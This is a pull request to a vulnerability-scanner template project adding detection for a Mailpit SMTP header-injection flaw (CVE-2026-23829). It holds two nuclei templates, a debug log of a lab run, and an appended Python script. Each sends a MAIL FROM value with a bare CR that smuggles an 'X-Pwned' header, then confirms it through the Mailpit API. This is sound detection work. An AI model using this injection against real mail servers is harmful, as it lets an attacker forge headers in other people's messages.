
Add CVE-2026-23829 for Mailpit SMTP CRLF Injection#14995

Open
omarkurt wants to merge 2 commits intoprojectdiscovery:mainfrom
omarkurt:CVE-2026-23829

Conversation

@omarkurt (Contributor)

Mailpit versions before 1.28.2 are vulnerable to SMTP CRLF Injection due to insufficient regex validation. Upgrade to version 1.28.3 or later to fix this issue.

PR Information

Template validation

  • Validated with a host running a vulnerable version and/or configuration (True Positive)
  • Validated with a host running a patched version and/or configuration (avoid False Positive)

@pussycat0x pussycat0x added the Status: In Progress This issue is being worked on, and has someone assigned. label Jan 29, 2026
@pussycat0x (Contributor)

Hello @omarkurt, we really appreciate you sharing this template with us. However, we’re experiencing some challenges in validating it. Could you please provide the debug data? That would be incredibly helpful! Thank you!

@pussycat0x pussycat0x added waiting for more info and removed Status: In Progress This issue is being worked on, and has someone assigned. labels Feb 5, 2026
@omarkurt (Contributor, Author)

omarkurt commented Feb 6, 2026

@pussycat0x , thanks for your efforts!

The template is functional, but it was quite confusing. I’ve simplified it and provided some information for better clarity.

By the way, there’s already an existing lab for the VT (VulnerableTarget) environment we’re using. https://vulnerabletarget.com/VT-2026-23829

vt-2026-23829-inject.yaml

id: vt-2026-23829-inject

info:
  name: "Mailpit SMTP Header Injection - Injector"
  author: omarkurt
  severity: medium
  tags: cve,cve-2026,mailpit,smtp,injection
  description: |
    This template injects a custom header into an SMTP transaction to test for
    header injection vulnerabilities in Mailpit. By sending a specially crafted
    MAIL FROM command with a newline and additional header, we can determine if
    the server is vulnerable to header injection. This is a non-destructive test
    that does not rely on any specific response content, making it suitable for
    safely identifying the vulnerability.

network:
  - host:
      - "{{Hostname}}:1025"

    read-all: true
    read-size: 4096

    inputs:
      - data: "EHLO {{Hostname}}\r\n"
      # Injecting X-Pwned header via MAIL FROM (bare CR, no LF, inside the reverse path)
      - data: "MAIL FROM:<attacker\rX-Pwned:{{randstr}}>\r\n"
      - data: "RCPT TO:<victim@example.com>\r\n"
      - data: "DATA\r\n"
      - data: "Subject: CVE-2026-23829 Proof\r\n\r\nCombined Template Check.\r\n.\r\n"
      - data: "QUIT\r\n"

    matchers:
      # "250 2.1.0 Ok" is the reply Mailpit gives to the MAIL FROM command
      # (third reply in the session, after the banner and the EHLO response)
      - type: word
        words:
          - "250 Ok"
          - "250 2.1.0 Ok"
        condition: or

vt-2026-23829-verify.yaml

id: vt-2026-23829-verify

info:
  name: "Mailpit SMTP Header Injection - Verification"
  author: omarkurt
  severity: medium
  description: |
    Checks the Mailpit API for the injected 'X-Pwned' header in the latest message.
  tags: cve,cve-2026,mailpit,api

http:
  # Step 1: fetch the most recent message and keep its ID for the next request
  - method: GET
    path:
      - "http://{{Hostname}}:8025/api/v1/messages?limit=1"

    extractors:
      - type: json
        name: msg_id
        part: body
        json:
          - ".messages[0].ID"
        internal: true

  # Step 2: pull the raw message and look for the smuggled header line
  - method: GET
    path:
      - "http://{{Hostname}}:8025/api/v1/message/{{msg_id}}/raw"

    matchers:
      - type: word
        words:
          - "X-Pwned:"
        condition: or

vt-2026-23829-workflow.yaml

nuclei -w vt-2026-23829-workflow.yaml -u localhost --debug

...
[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.5.1 (outdated)
[INF] Current nuclei-templates version: v10.3.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] Workflows loaded for current scan: 1
[WRN] Loading 2 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 0 URL from httpx
[INF] [vt-2026-23829-inject] Dumped Network request for localhost:1025
00000000  45 48 4c 4f 20 6c 6f 63  61 6c 68 6f 73 74 0d 0a  |EHLO localhost..|
00000010  4d 41 49 4c 20 46 52 4f  4d 3a 3c 61 74 74 61 63  |MAIL FROM:<attac|
00000020  6b 65 72 0d 58 2d 50 77  6e 65 64 3a 33 39 48 6e  |ker.X-Pwned:39Hn|
00000030  6e 61 63 41 72 54 44 33  33 5a 31 50 6a 4f 57 79  |nacArTD33Z1PjOWy|
00000040  57 5a 75 6c 78 6e 6f 3e  0d 0a 52 43 50 54 20 54  |WZulxno>..RCPT T|
00000050  4f 3a 3c 76 69 63 74 69  6d 40 65 78 61 6d 70 6c  |O:<victim@exampl|
00000060  65 2e 63 6f 6d 3e 0d 0a  44 41 54 41 0d 0a 53 75  |e.com>..DATA..Su|
00000070  62 6a 65 63 74 3a 20 43  56 45 2d 32 30 32 36 2d  |bject: CVE-2026-|
00000080  32 33 38 32 39 20 50 72  6f 6f 66 0d 0a 0d 0a 43  |23829 Proof....C|
00000090  6f 6d 62 69 6e 65 64 20  54 65 6d 70 6c 61 74 65  |ombined Template|
000000a0  20 43 68 65 63 6b 2e 0d  0a 2e 0d 0a 51 55 49 54  | Check......QUIT|
000000b0  0d 0a                                             |..| address=localhost:1025
[vt-2026-23829-inject:word-1] [tcp] [medium] localhost:1025
[DBG] [vt-2026-23829-inject] Dumped Network response for localhost:1025

00000000  32 32 30 20 36 36 34 30  38 30 33 65 38 62 34 62  |220 6640803e8b4b|
00000010  20 4d 61 69 6c 70 69 74  20 45 53 4d 54 50 20 53  | Mailpit ESMTP S|
00000020  65 72 76 69 63 65 20 72  65 61 64 79 0d 0a 32 35  |ervice ready..25|
00000030  30 2d 36 36 34 30 38 30  33 65 38 62 34 62 20 67  |0-6640803e8b4b g|
00000040  72 65 65 74 73 20 6c 6f  63 61 6c 68 6f 73 74 0d  |reets localhost.|
00000050  0a 32 35 30 2d 53 49 5a  45 20 30 0d 0a 32 35 30  |.250-SIZE 0..250|
00000060  2d 45 4e 48 41 4e 43 45  44 53 54 41 54 55 53 43  |-ENHANCEDSTATUSC|
00000070  4f 44 45 53 0d 0a 32 35  30 20 53 4d 54 50 55 54  |ODES..250 SMTPUT|
00000080  46 38 0d 0a 32 35 30 20  32 2e 31 2e 30 20 4f 6b  |F8..250 2.1.0 Ok|
00000090  0d 0a 32 35 30 20 32 2e  31 2e 35 20 4f 6b 0d 0a  |..250 2.1.5 Ok..|
000000a0  33 35 34 20 53 74 61 72  74 20 6d 61 69 6c 20 69  |354 Start mail i|
000000b0  6e 70 75 74 3b 20 65 6e  64 20 77 69 74 68 20 3c  |nput; end with <|
000000c0  43 52 3e 3c 4c 46 3e 2e  3c 43 52 3e 3c 4c 46 3e  |CR><LF>.<CR><LF>|
000000d0  0d 0a 32 35 30 20 32 2e  30 2e 30 20 4f 6b 3a 20  |..250 2.0.0 Ok: |
000000e0  71 75 65 75 65 64 20 61  73 20 37 62 66 45 75 6f  |queued as 7bfEuo|
000000f0  6b 48 45 73 39 76 70 47  52 48 79 51 48 64 54 50  |kHEs9vpGRHyQHdTP|
00000100  0d 0a 32 32 31 20 32 2e  30 2e 30 20 36 36 34 30  |..221 2.0.0 6640|
00000110  38 30 33 65 38 62 34 62  20 4d 61 69 6c 70 69 74  |803e8b4b Mailpit|
00000120  20 45 53 4d 54 50 20 53  65 72 76 69 63 65 20 63  | ESMTP Service c|
00000130  6c 6f 73 69 6e 67 20 74  72 61 6e 73 6d 69 73 73  |losing transmiss|
00000140  69 6f 6e 20 63 68 61 6e  6e 65 6c 0d 0a           |ion channel..|
[INF] [vt-2026-23829-verify] Dumped HTTP request for http://localhost:8025/api/v1/messages?limit=1

GET /api/v1/messages?limit=1 HTTP/1.1
Host: localhost:8025
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [vt-2026-23829-verify] Dumped HTTP response http://localhost:8025/api/v1/messages?limit=1

HTTP/1.1 200 OK
Connection: close
Content-Security-Policy: default-src 'self'; script-src 'nonce-495ghLJQssGbYDHDyAnxN3'; style-src * 'unsafe-inline'; frame-src 'self'; img-src * data: blob:; font-src * data:; media-src 'self'; connect-src 'self' ws: wss:; object-src 'none'; base-uri 'self';
Content-Type: application/json
Date: Fri, 06 Feb 2026 07:13:51 GMT
Referrer-Policy: no-referrer

{"total":3,"unread":2,"count":1,"messages_count":3,"messages_unread":2,"start":0,"tags":[],"messages":[{"ID":"7bfEuokHEs9vpGRHyQHdTP","MessageID":"UqvFHcZcSZPe4YxL4Ktf7j@mailpit","Read":false,"From":{"Name":"","Address":""},"To":null,"Cc":null,"Bcc":[{"Name":"","Address":"victim@example.com"}],"ReplyTo":[],"Subject":"CVE-2026-23829 Proof","Created":"2026-02-06T07:13:51.962Z","Username":"","Tags":[],"Size":360,"Attachments":0,"Snippet":"Combined Template Check."}]}
[INF] [vt-2026-23829-verify] Dumped HTTP request for http://localhost:8025/api/v1/message/7bfEuokHEs9vpGRHyQHdTP/raw

GET /api/v1/message/7bfEuokHEs9vpGRHyQHdTP/raw HTTP/1.1
Host: localhost:8025
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [vt-2026-23829-verify] Dumped HTTP response http://localhost:8025/api/v1/message/7bfEuokHEs9vpGRHyQHdTP/raw

HTTP/1.1 200 OK
Connection: close
Content-Security-Policy: default-src 'self'; script-src 'nonce-cgDTF273dkqfj7CgHSG6ZT'; style-src * 'unsafe-inline'; frame-src 'self'; img-src * data: blob:; font-src * data:; media-src 'self'; connect-src 'self' ws: wss:; object-src 'none'; base-uri 'self';
Content-Type: text/plain; charset=utf-8
Date: Fri, 06 Feb 2026 07:13:51 GMT
Referrer-Policy: no-referrer

Bcc: victim@example.com
Message-ID: <UqvFHcZcSZPe4YxL4Ktf7j@mailpit>
X-Pwned:39HnnacArTD33Z1PjOWyWZulxno>
Received: from localhost (unknown [192.168.155.1])
        by 6640803e8b4b (Mailpit) with SMTP
        for <victim@example.com>; Fri, 6 Feb 2026 07:13:51 +0000 (UTC)
Subject: CVE-2026-23829 Proof

Combined Template Check.
[vt-2026-23829-verify:word-1] [http] [medium] http://localhost:8025/api/v1/message/7bfEuokHEs9vpGRHyQHdTP/raw
[INF] Scan completed in 56.678334ms. 2 matches found.
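The same injection and verification that the two templates above perform, written out as one script so the mechanism is visible end to end. This is an added example, not code from this PR, from Mailpit or from nuclei. It assumes Mailpit's default ports (1025 for SMTP, 8025 for the API), exactly as the templates do; the `LOOSE_PATH` / `STRICT_PATH` regexes are a hypothetical illustration of the bug class named in the PR description (insufficient regex validation of the reverse path), not Mailpit's actual code; and the sample SMTP response and raw message are transcribed from the debug dump above so the parsing logic can be exercised offline.

```python
"""SMTP header injection via a bare CR in MAIL FROM, plus Mailpit API verification.

Added example, not part of this PR, Mailpit or nuclei. Ports are Mailpit defaults
(assumption, same as the templates). LOOSE_PATH/STRICT_PATH are hypothetical.
"""
import json
import re
import secrets
import socket
import urllib.request

SMTP_PORT = 1025  # Mailpit default SMTP port (assumption, as in the template)
API_PORT = 8025   # Mailpit default HTTP API port (assumption, as in the template)


def build_transaction(hostname: str, token: str, victim: str = "victim@example.com") -> bytes:
    """Same bytes the injector template sends: a bare CR inside the reverse path
    smuggles an extra header line; the random token lets the verifier pin the hit."""
    commands = [
        f"EHLO {hostname}",
        f"MAIL FROM:<attacker\rX-Pwned:{token}>",
        f"RCPT TO:<{victim}>",
        "DATA",
        "Subject: CVE-2026-23829 Proof\r\n\r\nCombined Template Check.\r\n.",
        "QUIT",
    ]
    return "".join(c + "\r\n" for c in commands).encode()


def reply_codes(response: bytes) -> list[str]:
    """Final reply code of every SMTP response; '250-' continuation lines are skipped."""
    codes = []
    for line in response.split(b"\r\n"):
        if len(line) >= 4 and line[:3].isdigit() and line[3:4] == b" ":
            codes.append(line[:3].decode())
    return codes


def mail_from_accepted(response: bytes) -> bool:
    """Replies come back in command order (banner, EHLO, MAIL FROM, ...), so the
    third final code belongs to MAIL FROM. A server that rejects the CR answers 5xx."""
    codes = reply_codes(response)
    return len(codes) >= 3 and codes[2] == "250"


def header_injected(raw_message: str, token: str) -> bool:
    """Look for our token as a standalone X-Pwned header above the blank line.
    Pinning the token avoids a false positive from a stale message of an earlier run;
    the optional '>' is the reverse path's closing bracket that lands after the token."""
    headers = raw_message.replace("\r\n", "\n").partition("\n\n")[0]
    pattern = re.compile(r"^X-Pwned:\s*" + re.escape(token) + r">?\s*$", re.M)
    return pattern.search(headers) is not None


# Hypothetical reverse-path validators (not Mailpit's code). In Python '.' matches
# '\r' (only '\n' is excluded without re.S), so anchoring on the angle brackets alone
# lets the bare CR through; the strict form rejects every ASCII control character.
LOOSE_PATH = re.compile(r"^<(.+)>$")
STRICT_PATH = re.compile(r"^<([^<>\x00-\x1f\x7f]+)>$")


def loose_accepts(reverse_path: str) -> bool:
    return LOOSE_PATH.match(reverse_path) is not None


def strict_accepts(reverse_path: str) -> bool:
    return STRICT_PATH.match(reverse_path) is not None


def run_check(host: str, timeout: float = 5.0) -> bool:
    """Live check against a reachable Mailpit: inject, then confirm through the API."""
    token = secrets.token_hex(8)
    with socket.create_connection((host, SMTP_PORT), timeout=timeout) as sock:
        sock.sendall(build_transaction(host, token))  # pipelined, as the template does
        response = b""
        try:
            while chunk := sock.recv(4096):
                response += chunk
        except socket.timeout:
            pass
    if not mail_from_accepted(response):
        return False
    base = f"http://{host}:{API_PORT}/api/v1"
    with urllib.request.urlopen(f"{base}/messages?limit=1", timeout=timeout) as r:
        msg_id = json.load(r)["messages"][0]["ID"]
    with urllib.request.urlopen(f"{base}/message/{msg_id}/raw", timeout=timeout) as r:
        return header_injected(r.read().decode("utf-8", "replace"), token)


# Constructed samples, transcribed from the debug dump in the PR, for offline use.
SAMPLE_RESPONSE = b"\r\n".join([
    b"220 6640803e8b4b Mailpit ESMTP Service ready",
    b"250-6640803e8b4b greets localhost", b"250-SIZE 0",
    b"250-ENHANCEDSTATUSCODES", b"250 SMTPUTF8",
    b"250 2.1.0 Ok", b"250 2.1.5 Ok",
    b"354 Start mail input; end with <CR><LF>.<CR><LF>",
    b"250 2.0.0 Ok: queued as 7bfEuokHEs9vpGRHyQHdTP",
    b"221 2.0.0 6640803e8b4b Mailpit ESMTP Service closing transmission channel",
]) + b"\r\n"

SAMPLE_RAW = (
    "Bcc: victim@example.com\r\n"
    "Message-ID: <UqvFHcZcSZPe4YxL4Ktf7j@mailpit>\r\n"
    "X-Pwned:39HnnacArTD33Z1PjOWyWZulxno>\r\n"
    "Received: from localhost (unknown [192.168.155.1])\r\n"
    "        by 6640803e8b4b (Mailpit) with SMTP\r\n"
    "Subject: CVE-2026-23829 Proof\r\n"
    "\r\n"
    "Combined Template Check.\r\n"
)
```

`run_check("localhost")` performs the live two-step check; everything else runs offline against the transcribed samples. The one deliberate difference from the verify template is that `header_injected` matches the header together with the random token from this run, where the template matches any `X-Pwned:` in the latest message, which would also fire on a message left over from an earlier run.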
